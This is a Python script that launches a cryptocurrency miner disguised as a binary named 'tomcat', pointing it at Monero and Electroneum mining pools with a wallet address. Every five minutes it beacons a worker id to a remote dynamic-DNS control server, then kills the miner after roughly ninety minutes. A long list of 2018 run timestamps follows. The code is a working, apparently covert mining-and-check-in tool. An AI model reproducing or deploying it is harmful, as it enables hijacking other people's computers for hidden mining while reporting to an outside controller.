import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:01.917015
#2018-02-17 16:20:08.671655
#2018-02-17 18:08:06.349222
#2018-02-17 19:56:05.789505
#2018-02-17 21:46:05.510568
#2018-02-17 23:31:03.482557
#2018-02-18 01:19:06.921975
#2018-02-18 03:07:01.311261
#2018-02-18 04:56:01.971620
#2018-02-18 06:47:04.046033
#2018-02-18 08:37:04.887304
#2018-02-18 10:23:06.633698
#2018-02-18 12:09:06.904034
#2018-02-18 13:54:07.613867
#2018-02-18 15:45:09.338335
#2018-02-18 17:34:02.950644
#2018-02-18 19:22:05.862759
#2018-02-18 21:07:05.085137
#2018-02-18 22:54:01.382317
#2018-02-19 00:42:03.695546
#2018-02-19 02:28:04.913016
#2018-02-19 04:15:07.491386
#2018-02-19 06:01:02.093262
#2018-02-19 07:49:06.995388
#2018-02-19 09:39:04.596627
#2018-02-19 11:27:09.127617
#2018-02-19 13:16:04.195763
#2018-02-19 15:05:12.845461
#2018-02-19 16:54:08.788047
#2018-02-19 18:42:08.349638
#2018-02-19 20:31:04.347499
#2018-02-19 22:17:06.470906
#2018-02-20 00:04:02.152265
#2018-02-20 01:52:07.303097
#2018-02-20 03:41:04.765815
#2018-02-20 05:26:07.756645
#2018-02-20 07:10:09.226177
#2018-02-20 08:56:07.485690
#2018-02-20 10:41:03.452487
#2018-02-20 12:27:09.756282
#2018-02-20 14:14:07.224484
#2018-02-20 15:58:12.031436
#2018-02-20 17:45:07.039069
#2018-02-20 19:37:06.161165
#2018-02-20 21:24:04.480464
#2018-02-20 23:09:07.480075
#2018-02-21 00:54:07.938118
#2018-02-21 02:41:04.661676
#2018-02-21 04:28:01.960803
#2018-02-21 06:16:01.488638
#2018-02-21 08:02:06.938552
#2018-02-21 09:49:04.724230
#2018-02-21 11:39:01.782703
#2018-02-21 13:28:07.404755
#2018-02-21 15:12:04.788386
#2018-02-21 17:02:01.495818
#2018-02-21 18:50:08.360556
#2018-02-21 20:36:06.778919
#2018-02-21 22:22:07.905834
#2018-02-22 00:11:08.673124
#2018-02-22 01:59:04.782791
#2018-02-22 03:46:04.239276
#2018-02-22 05:32:05.173931
#2018-02-22 07:17:05.257195
#2018-02-22 09:04:08.519976
#2018-02-22 10:53:05.415880
#2018-02-22 12:38:08.307062
#2018-02-22 14:24:06.559285
#2018-02-22 16:11:08.159141
#2018-02-22 17:58:08.463617
#2018-02-22 19:47:08.400871
#2018-02-22 21:37:06.822259
#2018-02-22 23:26:05.014709
#2018-02-23 01:13:02.146002
#2018-02-23 03:02:03.767087
#2018-02-23 04:47:06.403671
#2018-02-23 06:31:04.892061
#2018-02-23 08:18:07.535603
#2018-02-23 10:36:08.476395
#2018-02-23 12:31:07.407693
#2018-02-23 14:18:08.699422
#2018-02-23 16:09:09.261771
#2018-02-23 17:55:01.328769
#2018-02-23 19:42:09.857120
#2018-02-23 21:26:06.320237
#2018-02-23 23:36:05.357456
#2018-02-24 01:24:06.822154
#2018-02-24 03:16:03.909122
#2018-02-24 05:01:05.356295
#2018-02-24 06:49:04.322217
#2018-02-24 08:41:04.088348
#2018-02-24 10:25:06.468730
#2018-02-24 12:20:05.720331
#2018-02-24 14:12:07.316840
#2018-02-24 15:59:01.939622
#2018-02-24 17:52:01.663693
#2018-02-24 19:40:01.729689
#2018-02-24 21:26:07.778439
#2018-02-25 00:08:07.327364
#2018-02-25 04:10:08.606230
#2018-02-25 07:42:01.812458